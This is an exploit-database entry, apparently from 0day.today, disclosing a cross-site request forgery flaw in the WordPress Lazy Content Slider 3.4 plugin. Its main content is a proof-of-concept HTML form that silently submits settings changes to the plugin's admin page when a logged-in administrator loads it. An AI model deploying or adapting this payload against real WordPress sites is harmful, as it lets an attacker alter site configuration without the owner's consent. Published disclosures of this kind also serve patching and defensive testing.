WordPress Lazy Content Slider 3.4 Plugin - Cross-Site Request Forgery (Add Catetory)

2016-07-08T00:00:00
ID 1337DAY-ID-25167
Type zdt
Reporter Mojtaba MobhaM
Modified 2016-07-08T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.4
# Date: 2016/07/08
######################
#
# PoC:
# The vulnerable page is
# /wp-content/plugins/lazy-content-slider/lzcs_admin.php
# The Code for CSRF.html is
 
<html>
<form action="http://localhost/wp/wp-admin/admin.php?page=lazy-content-slider%2Flzcs.php" method="POST">
<input name="lzcs" type="text" value="lzcs">
<input name="lzcs_color" type="text" value="dark">
<input type="text" name="lzcs_count" value="5">
<input type="submit" value="go!!">
</form>
</html>
 
#
######################
# Discovered by :  Mojtaba MobhaM

#  0day.today [2018-04-08]  #